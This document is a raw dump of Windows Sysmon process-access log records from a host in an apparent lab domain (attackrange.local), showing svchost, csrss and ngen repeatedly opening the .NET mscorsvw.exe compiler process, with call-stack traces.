13:46:19.625{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912B-6005-CE01-00000000A301}4548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.609{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912B-6005-CE01-00000000A301}4548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:19.609{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912B-6005-CE01-00000000A301}4548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:19.500{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912B-6005-CD01-00000000A301}4432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.484{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912B-6005-CD01-00000000A301}4432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:19.484{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912B-6005-CD01-00000000A301}4432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:19.437{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912B-6005-CC01-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.437{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912B-6005-CC01-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:19.437{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912B-6005-CC01-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:19.265{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912B-6005-CB01-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.234{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912B-6005-CB01-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:19.234{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912B-6005-CB01-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:19.171{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912B-6005-CA01-00000000A301}4792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.171{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912B-6005-CA01-00000000A301}4792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:19.171{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912B-6005-CA01-00000000A301}4792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:19.125{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912B-6005-C901-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.125{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912B-6005-C901-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:19.125{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912B-6005-C901-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:19.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912B-6005-C801-00000000A301}4640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.000{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912B-6005-C801-00000000A301}4640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:19.000{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912B-6005-C801-00000000A301}4640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.984{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912C-6005-D401-00000000A301}1404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 
10341000x80000000000000006038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.984{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912C-6005-D401-00000000A301}1404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
